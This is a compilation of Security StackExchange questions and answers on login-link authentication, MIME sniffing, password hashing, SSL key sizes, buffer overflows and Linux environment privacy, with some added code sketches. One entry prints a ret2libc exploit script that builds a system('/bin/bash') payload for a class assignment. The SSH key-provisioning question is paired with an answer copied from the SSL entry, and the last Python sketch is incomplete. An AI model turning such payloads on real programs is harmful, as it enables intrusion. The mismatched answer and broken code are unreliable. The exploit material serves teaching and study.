12,828 | I've implemented a Forgot Password service in the following way: User goes to login page, clicks on "Forgot password?" User is presented with a form that asks for their email address. Email is sent to given address if in the database, with a link that contains a (supposedly) unique, long, randomly generated string, which is also stored in the database along with the time requested, allowing for a time limit to be set on the link (which it is) User clicks on link, it is validated, they are then asked to provide a new password. That's fairly standard, (though I could change small aspects of it), but it made me wonder - since good passwords are so infrequently provided/remembered, why not dispense with the password altogether and use the Forgot Password system instead? User goes to login page, fills out email address (or maybe a username to be more secure?) Email is sent with link. Link has very short time limit (< 5 mins) validity. User clicks link, they're in. In both scenarios, the user's email security - whether sniffed or broken in to - is the common threat, but in the second scenario: The link is valid for a much shorter time. It is also likely to be used up more quickly (any sort of validation email can be left alone, but if you definitely want to log in now you're going to use up that link when you get it). The user doesn't get to provide a shoddy password. The user only has to remember one password. A single account can't be shared among several people (unless they share an email address). An automated attack needs to break in to the email system and wait for an email, which is likely to be longer than the wait for a password to be unhashed i.e. better than bcrypt. I'm just wondering what are the downsides? I can see: User irritation, perhaps at having to wait for an email or log in to their email too It would likely open a new browser window, which can be irritating if you want to organise tabs A user might realise they have to protect their email account with a better password, change it, and then lock themselves out :-) It's just a thought. Thanks to everyone who put forth an answer, there are some really interesting (and definitely valid) points made that have really made me think and given me more areas to investigate. D.W. gets the tick because of the link provided that gives further insight into this particular type of situation, but I really appreciate all the answers given. | That's reasonable. From a security perspective, it is reasonable. I know some people who never write down their passwords for web servers; they just use the "forgot my password" link every time they want to log in. From a usability perspective, it might be a bit unfortunate, because email isn't instantaneous. Users will have to click "Email me", then wait for the email to show up, then click on the link in their email. Unfortunately, if users have to wait a few minutes (or even just 15 seconds) for the email to show up, they might get annoyed, give up, and go do something else -- or go to your competitor. A further improvement. It is possible to improve the idea a little bit further, to reduce the usability impact. When the user clicks the link in the email, you could set a persistent secure cookie on their browser. The result is that when the user clicks the link, they're in, and they won't need to go through the rigamarole again in the future on this computer (unless they clear their passwords). 
On future visits from the same computer, the site will automatically recognize them and no login or links will need to be clicked. This is not appropriate/sufficient for high-security services, like online banking, where you need to prevent the user's roommate from logging into their account -- but it might be fine for most web sites. Evaluation. Here is a research paper that investigates this approach and finds it provides increased security against the attacks evaluated in the paper: Chris Karlof, J.D. Tygar, and David Wagner. Conditioned-safe Ceremonies and a User Study of an Application to Web Authentication . NDSS 2009. | {
"source": [
"https://security.stackexchange.com/questions/12828",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8518/"
]
} |
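A minimal sketch of the token handling behind the email-link login scheme discussed above. The function names and the in-memory store are assumptions for illustration; a real deployment would persist the hashed token in a database and deliver the link by email.

# email_login_tokens.py -- sketch of issuing and checking a short-lived login-link token
import hashlib, secrets, time

TOKEN_TTL = 300                     # five minutes, as suggested in the question
_pending = {}                       # hash(token) -> (email, expiry); use a database in practice

def issue_token(email):
    token = secrets.token_urlsafe(32)                        # unguessable random value
    token_hash = hashlib.sha256(token.encode()).hexdigest()  # store only the hash
    _pending[token_hash] = (email, time.time() + TOKEN_TTL)
    return token                                             # embed this in the emailed link

def redeem_token(token):
    token_hash = hashlib.sha256(token.encode()).hexdigest()
    record = _pending.pop(token_hash, None)                  # single use: consumed on first attempt
    if record is None:
        return None
    email, expiry = record
    return email if time.time() <= expiry else None          # caller starts a session on success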
12,896 | In Tangled Web Michal Zalewski says: Refrain from using Content-Type: application/octet-stream and use application/binary instead, especially for unknown document types. Refrain from returning Content-Type: text/plain. For example, any code-hosting platform must exercise caution when returning executables or source archives as application/octet-stream, because there is a risk they may be misinterpreted as HTML and displayed inline. The text/plain logic subsequently implemented in Internet Explorer and Safari in order to detect HTML in such a case is really bad news: It robs web developers of the ability to safely use this MIME type to generate user-specific plaintext documents and offers no alternatives. This has resulted in a substantial number of web application vulnerabilities, but to this day, Internet Explorer developers seem to have no regrets and have not changed the default behavior of their code. Site uses X-Content-Type-Options:nosniff . Author says the following about this header: The use of this header [X-Content-Type-Options] is highly recommended; unfortunately, the support for it [...] has only a limited support in other browsers. In other words, it cannot be depended on as a sole defense against content sniffing. What content sniffing attacks X-Content-Type-Options:nosniff doesn't prevent? What Content-Type should be returned to the user instead of text/plain? | Background. X-Content-Type-Options: is a header that is designed to defend against MIME content-sniffing attacks . MIME content-sniffing attacks are a risk when you allow users to upload content (e.g., images, documents, other files) to your website, where they can be downloaded by other users. As @Rook says, this has nothing to do with eavesdropping/capturing network traffic. What attacks doesn't it prevent? Because X-Content-Type-Options: is only supported on some browsers, it does not protect against attacks on users who use other browsers. In particular, it is supported on IE, Chrome, and Firefox 50 . See also What are the security risks of letting the users upload content to my site? for some other attacks it doesn't prevent, e.g., uploading of malware or unsavory content, uploading of content that exploits a vulnerability in the user's browser, etc. What content type should be returned? You should return the appropriate content type for that file. You should not allow users to upload untrusted content with dangerous content types. For more details, please see the answers to the following questions: Is it safe to serve any user uploaded file under only white-listed MIME content types? Is it safe to store and replay user-provided mime types? MIME sniffing protection Why should I restrict the content type of files be uploaded to my site? What are the security risks of letting the users upload content to my site? How can I be protected from pictures vulnerabilities? Using file extension and MIME type (as output by file -i -b) combination to determine unsafe files? This topic has been extensively discussed and documented elsewhere on this site, so I'm not going to try to repeat all of the useful advice found there. Update: I just learned that setting the Content-Type and X-Content-Type-Options headers appropriately is not enough for security. Apparently, Flash ignores the Content-Type header , which could allow loading a malicious SWF, which can then do everything you'd do with an XSS. (Sigh, stupid Flash.) Unfortunately, no amount of whitelisting of file content types can stop this attack.
Consequently, it appears that the only safe solution is to host the user-uploaded content on a separate domain. | {
"source": [
"https://security.stackexchange.com/questions/12896",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5501/"
]
} |
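To tie the advice in the answer above together, here is a sketch of conservative response headers for serving user-uploaded files. The whitelist is illustrative rather than exhaustive, and, per the Flash caveat at the end of the answer, headers alone are not sufficient; hosting uploads on a separate domain remains the safer design.

# upload_headers.py -- sketch of conservative headers for user-uploaded downloads
import os

# Only these extensions are ever served with a renderable type; everything else is
# forced to download as opaque bytes.
ALLOWED_TYPES = {
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".gif": "image/gif",
    ".pdf": "application/pdf",
}

def headers_for_upload(filename):
    ext = os.path.splitext(filename)[1].lower()
    known = ext in ALLOWED_TYPES
    return {
        "Content-Type": ALLOWED_TYPES.get(ext, "application/octet-stream"),
        "X-Content-Type-Options": "nosniff",     # ask the browser not to second-guess the type
        "Content-Disposition": "inline" if known else "attachment",
    }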
13,105 | I know this newspaper article sounds absurd. Even if a machine is compromised we (should) have hardware safe guards in all our devices to prevent the software from damaging the hardware. But is it possible to make a computer explode or catch fire? Has this ever been done? | In 2011 the news was reporting on HP Printers catching fire . HP Responded saying that there was a hardware element called a "thermal breaker" to prevent this from happening. The researcher never produced a burning pile of printer. Also in 2011 Charlie Miller was researching the firmware on Apple's batteries trying to get them to explode or catch fire.
However, the worst he was able to do was brick the battery. Edit Feb 2014 - CrowdStrike demonstrated an attack at RSA on a Mac which overrode temperature controls, powered off the fans and spiked the CPU usage in order to overheat the machine. And while this specific example was limited, as fires are not welcomed in the Moscone Centre, the team states that they can cause the machine to catch fire. Now let's flash back to 1985. The Therac-25 radiation therapy machine was killing people due to a bug in how the software interacted with hardware. An earlier model had "Hardware Interlocks" which prevented the operator from accidentally overdosing patients with radiation. All of the devices we use should have a hardware control preventing software from damaging the physical world. But there are some systems where it's impractical for hardware to prevent all damage to physical systems. This is the real fear behind vulnerabilities in SCADA systems. It may be possible for an attacker to remove safety controls used by a power plant or put it into an unstable state. An example of this happening in real life is Stuxnet being used to destroy centrifuges. There is some evidence to suggest that a hacker was the cause of a missile explosion at an Iranian military base. So if the computer happens to also be a bomb, then yes, a hacker can probably make it explode.
"source": [
"https://security.stackexchange.com/questions/13105",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/975/"
]
} |
13,165 | I have an account in an online banking system and they have the FAQ with something like this: How secure is the <Online Banking System Name> ? Each page you view and any information submitted on <Online Banking System Name> is encrypted between the client's computer and the <Online Banking System Name> server using 128-bit SSL... Sensitive data is encrypted Sensitive data such as the client's <Online Banking System Name> password is encrypted using a one-way 160-bit hash cryptographic algorithm that turns an arbitrary-length input into a fixed-length binary value, and this transformation is one-way, that is, given a hash value it is statistically infeasible to recreate a document that would produce this value... Does this make their online banking system more prone to malicious attack? | Is it alright to tell everyone your encryption information? It's not just alright, it's actually a design feature of modern ciphers. The whole concept of cryptography is that you can freely publish the algorithm used, but must keep secret a specific piece of information, called the key. password is encrypted using a one-way 160-bit hash cryptographic algorithm Encrypted is the wrong word here - this is not encryption; rather, it's hashing. Encryption is a reversible process where recovery of the data is the aim of the game. A hash function, however, is designed such that it is "one way", i.e. it is trivial to take a given input and produce the hash, but hard to go backwards. If you think about it, this makes an awful lot of sense - the bank doesn't need to know your password; they only need to know that the person entering the password has entered the same one as you initially told them. So, by storing the hash of your password, they can compare future password inputs against that stored hash and voila! They need not know the password, but they can check it. Technically, they're on the right lines; 160 bits suggests an SHA1 or RIPEMD160 algorithm. However, if a simple hash is all they do, there is more they can do to improve security: Use a salt value, ideally uniquely generated per password. Use a slow hashing function such as PBKDF2. | {
"source": [
"https://security.stackexchange.com/questions/13165",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7493/"
]
} |
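To illustrate the two closing suggestions in the answer above (a unique salt per password and a slow hash), here is a minimal PBKDF2 sketch using Python's standard library. The iteration count is an assumption to be tuned to your own hardware, and on most platforms a ready-made password-hashing facility (e.g. a bcrypt wrapper) is preferable to rolling your own.

# password_hashing.py -- sketch of salted, slow password hashing
import hashlib, hmac, os

ITERATIONS = 600_000                       # tune upward as hardware allows

def hash_password(password):
    salt = os.urandom(16)                  # unique random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest                    # store both next to the account record

def verify_password(password, salt, stored_digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored_digest)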
13,194 | I have to exploit a very simple buffer overflow in a vulnerable C++ program for an assignment and I have not been able to find the environment variable SHELL. I have never worked with a BoF before, and after reading lots of similar questions, posts, etc. I have this information (correct me if it's wrong): The program stores the environment variables in a global variable called environ . I can find the address of this variable like this: (gdb) info variable environ
All variables matching regular expression "environ":
Non-debugging symbols:
0xb7fd1b00 __environ
0xb7fd1b00 _environ
0xb7fd1b00 environ I need to find the /bin/bash string in that variable to launch a shell (I have already got the system and exit addresses, I only need the route to the shell). And here is where I don't know what to do. I have been reading gdb tutorials, but still nothing. x/s 0xb7fd1b00 does not output anything useful. | environ is a pointer to pointer, as it has the type char **environ . You have to try something like: (gdb) x/s *((char **)environ)
0xbffff688: "SSH_AGENT_PID=2107"
(gdb) x/s *((char **)environ+1)
0xbffff69b: "SHELL=/bin/bash" | {
"source": [
"https://security.stackexchange.com/questions/13194",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8143/"
]
} |
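Once the address of the "SHELL=/bin/bash" string is known (as in the answer above), the classic 32-bit ret2libc layout chains it with system() and exit(). The sketch below is illustrative only: the padding length and the system()/exit() addresses are placeholders to be replaced with whatever gdb reports on the actual target, the SHELL address is the one from the answer's gdb output, and exercises like this typically assume ASLR is disabled so the addresses stay stable between runs.

# ret2libc_payload.py -- sketch of the classic 32-bit system()/exit() overwrite layout
import struct, sys

# All of these values are placeholders -- take them from gdb on the target binary.
PADDING_LEN  = 64                          # bytes needed to reach the saved return address
SYSTEM_ADDR  = 0xb7e5f430                  # address of system() in libc (placeholder)
EXIT_ADDR    = 0xb7e52fb0                  # address of exit() in libc (placeholder)
SHELL_ENV    = 0xbffff69b                  # address of "SHELL=/bin/bash" from the gdb output above
BINBASH_PTR  = SHELL_ENV + len("SHELL=")   # skip the prefix to point at "/bin/bash"

payload  = b"A" * PADDING_LEN
payload += struct.pack("<I", SYSTEM_ADDR)  # overwritten return address -> system()
payload += struct.pack("<I", EXIT_ADDR)    # return address system() will use -> exit()
payload += struct.pack("<I", BINBASH_PTR)  # argument passed to system()

sys.stdout.buffer.write(payload)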
13,353 | My connection.php file stores the credentials to connect to the database: <?php
$objConnect = mysql_connect("localhost","username","password");
mysql_select_db("selectDB", $objConnect);
?> When a page needs to connect to the database I just use <?php include("connection.php"); ?> . Is this safe? Can hackers steal my credentials from that file? | My recommendation: Don't store passwords in source code. Instead, store them in a configuration file (outside of the web root), and make sure the configuration file is not publicly accessible. The reason is that you normally don't want to keep your passwords checked into the source code repository or exposed to everyone who can view files in your web root. There is an additional risk with storing passwords in a .php file within your webroot, which is a bit obscure but can be easily avoided by placing the file outside of your web root. Consider: if you are editing connection.php using a text editor, and your connection drops while you are editing it, your editor will automatically save a copy of the connection.php file in some backup file: e.g., connection.php~ (in the same directory). Now the backup file has a different extension, so if someone tries to fetch that file, the Apache server will happily serve up a copy of the file in plaintext, revealing your database password. See 1% of CMS-Powered Sites Expose Their Database Passwords for details. See also How do open source projects handle secure artifacts?, Open Source and how it works for secure projects? | {
"source": [
"https://security.stackexchange.com/questions/13353",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8849/"
]
} |
13,361 | I was browsing a website, and stumbled across a sample scheme for password-protecting web pages. The owner of the website specifically had a page that invited people to attempt to hack it. I wanted to give it a try, so I wrote up a quick python script a few hours ago to try brute-forcing the password. (Which, in retrospect, was a stupid idea). I left the script running for a few hours, but came back to find that my script was running haywire and the website was returning '509 Bandwidth limit exceeded' errors on all its pages. ( [EDIT]: I also checked via 3g on my phone, and using a school computer, so I know it's not limited to just my ip address) This is not something I had intended to do, and feel really, really bad about it. Should I send an email apologizing and offering to pay reparations?
Or am I just unnecessarily worried, and should let this blow over? (I'm also not sure where in stackexchange to ask this question, but I think it might fit here). [UPDATE]: I sent an email apologizing -- once the site owner responds, I'll update this post. [UPDATE]: Well, it's been several days now. The website is still down and the owner hasn't responded yet. I originally wanted to wait for a response first before accepting an answer, but it might be a while, so I'll pick an answer. | First off, let me say this: I respect the ethics of anyone who would ask this kind of question (rather than just closing their eyes, walking away, and forgetting the whole thing). My compliments to you. Ultimately, this is a matter of personal ethics, so it is hard to give advice. You need to do what you feel is right. That said, your suggestion to try contacting the site owner seems reasonable to me. I suspect that any harm done will be minor or that the cost will be minor. Normally, the cost of bandwidth is pretty modest, in monetary terms. But the site owner might appreciate hearing that his/her site is unreachable, and appreciate the apology. But it's up to you, and what feels right to you. | {
"source": [
"https://security.stackexchange.com/questions/13361",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8855/"
]
} |
13,453 | After running a few tests from Qualsys' SSL Labs tool, I saw that there were quite significant rating differences between a GoDaddy and VeriSign certificate that I have tested against. Are all SSL certificates from different providers equal? If not, what should one base their decision on? Currently I believe that most people will weigh up the cost vs. brand (I.e.: GoDaddy ~$70.00 vs. Verisign ~$1,500.00). I have a feeling from what I have seen that a lot of this also depends on how the SSL is actually implemented - would this be a more accurate conclusion? For clarity: Godaddy SSL Lab Report Google SSL Lab Report | Disclaimer: This answer comes directly from the eHow article . No infringement intended. Domain Validation SSL Certificates Domain validated SSL certificates are used to establish a baseline level of trust with a website and prove that you are visiting the website you think you are visiting. These certificates are issued after the SSL issuer confirms that the domain is valid and is owned by the person who is requesting the certificate. There is no need to submit any company paperwork to obtain a Domain Validation SSL certificate, and these types of SSL certificates can be issued extremely quickly. The disadvantage to these types of certificates is that anyone can get them, and they hold no real weight except to secure communication between your web browser and the web server. Organization Validation SSL Certificates An Organization Validation SSL certificate is issued to companies and provides a higher level of security over a Domain Validation SSL certificate. An Organization Validation certificate requires that some company information be verified along with domain and owner information. The advantage of this certificate over a Domain Validation certificate is that it not only encrypts data, but it provides a certain level of trust about the company who owns the website. Extended Validation SSL Certificates An Extended Validation SSL Certificate is a "top of the line" SSL certificate. Obtaining one requires that a company go through a heavy vetting process, and all details of the company must be verified as authentic and legitimate before the certificate is issued. While this certificate may seem similar to an Organization Validation SSL certificate, the key difference is the level of vetting and verification that is performed on the owner of the domain and the company that is applying for the certificate. Only a company that passes a thorough investigation may use the Extended Validation SSL certificate. This type of certificate is recognized by modern browsers and is indicated by a colored bar in the URL portion of the browser. Additonally, OV versus EV also have an impact in terms of insurance amounts in case of compromise. The insurance premium for an EV lies a lot higher than with an OV. Read more/original: Mickey Walburg, Differences in SSL Certificates | eHow.com | {
"source": [
"https://security.stackexchange.com/questions/13453",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/493/"
]
} |
13,624 | Most of the banks use a 128-bit or 256-bit encryption. What does this mean? Does it mean that the keys used in SSL are 128-bit long or what? If they are the SSL key lengths then 128 bit RSA keys are easy to decrypt. The rsa site itself recommends keys having length of 1024 bits or more. | You can pretty much ignore the statements about 128 and 256 bits. It is a marketing statement intended to sound impressive, but really it just means that they are using SSL in a not-totally-stupid way. (It means the symmetric-key cipher is using a 128-bit or 256-bit key. This ensures that the symmetric cipher is not the weakest link in the chain. However since the symmetric cipher is not the weakest link in the chain, the risks will be primarily elsewhere, so you shouldn't get too caught up in the meaning of 128- or 256-bit strength. This just means that they haven't chosen a stupid configuration that makes the symmetric key readily breakable. It does not mean that the RSA key is 128 bits or 256 bits; as you say, a 128-bit or 256-bit RSA key would be totally insecure.) There is a lot written about this topic on this site. I suggest you read Is visiting HTTPS websites on a public hotspot secure? . Also see the blog entry QotW #3: Does an established SSL connection mean a line is really secure? .
And read Is accessing bank account on the internet really secure? and Does an established ssl connection mean a line is really secure . Doing a search on this site will find lots of information -- give it a try! | {
"source": [
"https://security.stackexchange.com/questions/13624",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8201/"
]
} |
13,640 | I know the title is just baiting the "your setup is insecure", but allow me to explain. I'm working on an application which aims to allow clients to rsync over SSH to our server. We need a web application from which we can create/rotate SSH keys for our users. This application will return a private SSH key to the user for their future use and will store the public key user's authorized_keys file. Upon registration, we'll need to automatically create the user and initial .ssh directory and keys. We're on CentOS 5 now, but we're flexible if there's sufficient reason to migrate. This server will be running only this web application in Apache (as apache:apache) and no data other than the synchronized user data will be stored on the system. I've been thinking about the following solution, but have been running into trouble: Grant sudo useradd privileges to the apache user to allow them to create new users Call sudo useradd from the PHP script in the web application with a umask of 000 on the newly created home directory. chgrp the new home directory to apache so that apache will be able to create a new .ssh directory and write the keys.* chmod the new home directory to 770 so that only the user and apache have access.* mkdir .ssh in the new home directory and ssh-keygen to create the new key, storing the public key in authorized_keys and passing the private key back to the calling client. The problems I'm encountering are with the *d points -- it seems that, even with chmod 777 I'm not able to chgrp or chmod the directory, as it's been created with the owner and group belonging to the new user. I've looked at changing the user's default group to something that would allow apache to write to it, but I can't find a way to do that without having to grant apache usermod sudo privileges, which seems like a really bad idea. Any thoughts would be appreciated! | You can pretty much ignore the statements about 128 and 256 bits. It is a marketing statement intended to sound impressive, but really it just means that they are using SSL in a not-totally-stupid way. (It means the symmetric-key cipher is using a 128-bit or 256-bit key. This ensures that the symmetric cipher is not the weakest link in the chain. However since the symmetric cipher is not the weakest link in the chain, the risks will be primarily elsewhere, so you shouldn't get too caught up in the meaning of 128- or 256-bit strength. This just means that they haven't chosen a stupid configuration that makes the symmetric key readily breakable. It does not mean that the RSA key is 128 bits or 256 bits; as you say, a 128-bit or 256-bit RSA key would be totally insecure.) There is a lot written about this topic on this site. I suggest you read Is visiting HTTPS websites on a public hotspot secure? . Also see the blog entry QotW #3: Does an established SSL connection mean a line is really secure? .
And read Is accessing bank account on the internet really secure? and Does an established ssl connection mean a line is really secure . Doing a search on this site will find lots of information -- give it a try! | {
"source": [
"https://security.stackexchange.com/questions/13640",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8628/"
]
} |
13,664 | I recently read an article about researchers being able to penetrate the Facebook network and making lots of friends with about 100 "Social" bots. What would prevent somebody to do the same on Stack Exchange sites, so as to increase his reputation? He might do this in order to finance bounties and have questions answered quickly for free. Update : how I imagined an attack: Initial seeding: create 100 profiles on a Stack Exchange site; Have a Social Bot manage each profile; Slowly (i.e., during several weeks) Social Bots post questions, post answers (to questions asked by other Social Bots), up questions and answers. Result: you end up with 100 profiles having a pretty good reputation. | Stack Exchange has multiple layers of security preventing this. Captchas and email addresses are required. The email check is easy to beat with a script, but the captchas aren't; you'd need a Captcha breaking service to even get this off the ground. None of your bots can vote at the start, so you can't accumulate rep just by posting questions; human eyes have to look over your post and manually give you your first reputation. At best your bots could get rep only by other bots accepting answers. After each bot gets an accepted answer they would be able to upvote however. Once they can upvote you start running into fraud detection ; cross voting where a significant % of votes are split between two users are automatically flagged for moderator attention, and serial upvotes (more than a couple inside of a few minutes) would automatically be reversed, so you'd have to be VERY careful in how you implement this. Even if you surpass the automated fraud detection, which would require significant effort and tools programmed specifically for the Stack Exchange Network , you run into the problem of human moderation . All posts on SE are getting human eyeballs on them. If your bots are asking duplicate questions, they're going to get closed. If they're asking gibberish or spam questions, they're going to get deleted, and deleted posts don't earn rep (certain outstanding circumstances aside). Basically your bots would have to post actual, new, good questions in order to not be found out and shut down. SE has some okay automatic detection scripts here, but there's no way an army of bots would go unnoticed simply because you'd need an amazing artificial intelligence to actually write enough new questions and answers to pull this off. Facebook hacking can be a lot easier because no one has to see your bot friends; Facebook profiles can go without human scrutiny, Stack Exchange posts cannot. I'm not a Stack Exchange employee however, so there may well be additional security measures I'm unaware of, but as a user and moderator those are the significant points I'm aware of. | {
"source": [
"https://security.stackexchange.com/questions/13664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8765/"
]
} |
13,666 | I have Active Directory Certificate Services on my server, which makes it possible for me to deliver an SSL certificate for the websites hosted on the same server. I know that normally, I need to acquire a certificate from a known certification authority. But I have my reasons¹ for not doing it. That's not the point. The question is, what could be (if any) the security risk of hosting the certificate yourself, instead of using the services of a known authority? ¹ The reasons being that (1) I'm a geek and it's fun to create your own certificates, that (2) I want to test Certificate Services, and that (3) I don't care about browsers complaining about the fact that they don't know about me, because I will be the only one to use HTTPS. | Using an SSL certificate for your websites primarily gets you two things: identity proofing that your website is who it says it is, and stream encryption of the data between the webserver and the client. Doing what you propose, which is normally called self-signing, prevents you from relying on the identity proofing. By using a known trusted CA the client can follow the signature chain from the certificate you present up to a root level trusted CA and gain some confidence that you are who you say you are. (It should be noted that this trust is really more like faith, as CA compromises do occur and some CAs take proofing much more seriously than others.) You will, however, still have the data encryption. So if you don't need the trust aspect, then you should be fine. Personally, I have several web sites and webapps at home that I use self-signed certificates for. Since I'm the only user, I can reasonably verify the certificate manually without the need for a 3rd party to tell me that the computer under my own desk is really the computer under my desk. | {
"source": [
"https://security.stackexchange.com/questions/13666",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7684/"
]
} |
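For the "it's fun to create your own certificates" angle above, a self-signed certificate does not even require AD Certificate Services; a single OpenSSL command produces a key pair and certificate (the file names, lifetime and CN below are placeholders). Browsers will still warn about it, exactly as the answer explains, because no trusted chain exists - which is fine when you are the only user and can verify the fingerprint yourself.

openssl req -x509 -newkey rsa:2048 -sha256 -days 365 -nodes -keyout server.key -out server.crt -subj "/CN=myserver.local"

On OpenSSL 1.1.1 or later, adding -addext "subjectAltName=DNS:myserver.local" keeps modern clients from rejecting the certificate for lacking a SAN.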
13,799 | Is WebGL a potential security problem due to the low level access it provides? For example, a web page can attempt to compile and run any shader source it wants. It seems that security would especially be a problem with open source web browsers, as an attacker could more easily find vulnerabilities in the implementation. | Yes, WebGL is indeed a potential security risk, though the magnitude of the risk is hard to assess and open to debate. There are some tricky issues here. The browsers have put in place some defenses against the security risks, but there seems to be some debate about whether those defenses will prove adequate in the long run. One major risk is that WebGL involves running code directly on the video card, and exposing APIs that provide direct access to video card APIs. The browser does attempt to sandbox this code (to a certain extent), and browsers do enforce a number of security restrictions designed to prevent malicious behavior. However, many of these APIs and their implementations were not originally designed to be provided to untrusted entities (they were only usable by native applications, which are fully trusted), so there are concerns about whether exposing them to arbitrary web sites might enable web sites to attack your system. There was one high-visibility white paper (see also the sequel ) which looked at the security of the WebGL implementation in browsers at the time, and found a number of vulnerabilities. They found some memory safety issues in several WebGL APIs, and also found some attacks that would allow one web site to read pixel data of other web sites (which could enable a breach of confidentiality). See also this third study , which demonstrated the existence of these vulnerabilities on a number of browsers and web cards (at the time). Browsers have responded to this with a variety of defenses: they have blacklisted video cards with known security problems; they have tried to fix the known memory safety problems; and they have restricted use of WebGL per the same-origin policy , to prevent a malicious web site from using WebGL to spy on users' use of other web sites . There is some ongoing debate over whether these defenses will prove adequate in the long term. Microsoft has taken the position that WebGL is too great a security risk and the existing defenses are not robust enough . On the other hand, Mozilla takes the position that the defenses they have put in place will be adequate, and that WebGL provides important value to the web. Ars Technica has an excellent round-up of the issue ; and here is another press report . P.S. I completely disagree with your statement about it being particularly a problem for open source web browsers. That's a myth. See Open Source vs Closed Source Systems , which already covers these arguments. (See also Chrome vs Explorer - how to explain in plain words that open-source is better? for additional thoughtful discussion on this topic.) | {
"source": [
"https://security.stackexchange.com/questions/13799",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
13,803 | What is the difference between Federated Login and Single Sign On authentication methods? | Single Sign-on (SSO) allows users to access multiple services with a single login. The term is actually a little ambiguous. Sometimes it's used to mean that (1) the user only has to provide credentials a single time per session, and then gains access to multiple services without having to sign in again during that session. But sometimes it's used to mean (2) merely that the same credentials are used for multiple services; the user might have to login multiple times, but it's always the same credentials . So beware, all SSO's are not the same in that regard. Many people (me included) only consider the first case to be "true" SSO. Federated Identity (FID) refers to where the user stores their credentials. Alternatively, FID can be viewed as a way to connect Identity Management systems together. In FID, a user's credentials are always stored with the "home" organization (the "identity provider"). When the user logs into a service, instead of providing credentials to the service provider, the service provider trusts the identity provider to validate the credentials. So the user never provides credentials directly to anybody but the identity provider. FID and SSO are different, but are very often used together. Most FID systems provide some kind of SSO. And many SSO systems are implemented under-the-hood as FID. But they don't have to be done that way; FID and SSO can be completely separate too. | {
"source": [
"https://security.stackexchange.com/questions/13803",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9151/"
]
} |
13,900 | Will they be resolved by my VPN provider, or by my original ISP (if left on "automatic" settings)? Would I have to manually configure a dns server, to make sure my requests will not be resolved by my ISP (constituting a privacy risk)? | The requests will be passed to the IP that's configured. So if your DNS is still your ISP's DNS, then yes you will still be asking your ISP to resolve a domain name for you. | {
"source": [
"https://security.stackexchange.com/questions/13900",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
14,000 | Perhaps this is a trivial question, but how accessible are environment variables in Linux between different users? e.g. if Alice executes export FAVORITE_FOOD=`cat /home/alice/fav_food.txt` Can Eve tell what's Alice's favourite food? (Assuming both Alice and Eve are normal users, and Eve doesn't have read access to /home/alice/fav_food.txt ) | Let's trace the flow of the confidential data. In this analysis, it is understood that anything Alice can do, root can also do. Also an external observer “one level up” (e.g. with physical access to snoop on the disk bus, or in the hypervisor if the code is running in the virtual machine) might be able to access the data. First, the data is loaded from a file. Assuming that only Alice has read permission on the file and the file is not otherwise leaked, only Alice can call cat /home/alice/fav_food.txt successfully. The data is then in the memory of the cat process, where only that process can access it. The data is transmitted over a pipe from the cat command to the calling shell; only the two processes involved can see the data on the pipe. The data is then in the memory of the shell process, again private to that process. At some point, the data will end up in the shell's environment. Depending on the shell, this may happen when the export statement is executed, or only when the shell executes an external program. At this point, the data will be an argument of an execve system call. After that call, the data will be in the environment of the child process. The environment of a process is just as private as the rest of that process's memory (from mm->env_start to mm->env_end in the process's memory map). It's contiguous with the initial thread's stack . However, there is a special mechanism that allows other processes to view a copy of the environment: the environ file in the process's /proc directory ( /proc/$pid/environ ). This file is only readable by its owner , who is the user running the process (for a privileged process, that's the effective UID). (Note that the command line arguments in /proc/$pid/cmdline , on the other hand, are readable by all.) You can audit the kernel source to verify that this is the only way to leak the environment of a process. There is another potential source for leaking the environment: during the execve call . The execve system call does not directly leak the environment. However, there is a generic audit mechanism that can log the arguments of every system call, including execve . So if auditing is enabled, the environment can be sent through the audit mechanism and end up in a log file. On a decently configured system, only the administrator has access to the log file (on my default Debian installation, it's /var/log/audit/audit.log , only readable by root, and written to by the auditd daemon running as root). I lied above: I wrote that the memory of a process cannot be read by another process. This is in fact not true: like all unices, Linux implements the ptrace system call. This system call allows a process to inspect the memory and even execute code in the context of another process. It's what allows debuggers to exist. Only Alice can trace Alice's processes. Furthermore, if a process is privileged (setuid or setgid), only root can trace it. Conclusion: the environment of a process is only available to the user (euid) running the process . Note that I assume that there is no other process that might leak the data. 
There is no setuid root program on a normal Linux installation that might expose a process's environment. (On some older unices, ps was a setuid root program that parsed some kernel memory; some variants would happily display a process's environment to any and all. On Linux, ps is unprivileged and gets its data from /proc like everyone else.). (Note that this applies to reasonably current versions of Linux. A very long time ago, I think in the 1.x kernel days, the environment was world-readable.) | {
"source": [
"https://security.stackexchange.com/questions/14000",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7306/"
]
} |
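To make the /proc/<pid>/environ point in the answer above concrete, here is a minimal Python sketch (an editorial illustration, not part of the original answer). The PID is taken from the command line and is an arbitrary choice; run it against one of your own processes and then against another user's process to see the kernel's permission check in action.

# Minimal sketch: read a process's environment from /proc/<pid>/environ on Linux.
# Entries are NUL-separated; the kernel only lets the process's owner (or root) read this file.
import sys

def read_environ(pid):
    try:
        with open("/proc/%d/environ" % pid, "rb") as f:
            raw = f.read()
    except PermissionError:
        # This is the access control described above: Eve gets "permission denied" on Alice's processes.
        print("Permission denied for PID %d (not your process, and you are not root)." % pid)
        return {}
    pairs = [e for e in raw.split(b"\0") if b"=" in e]
    return dict(e.decode(errors="replace").split("=", 1) for e in pairs)

if __name__ == "__main__":
    pid = int(sys.argv[1]) if len(sys.argv) > 1 else 1   # PID 1 is normally unreadable for non-root users
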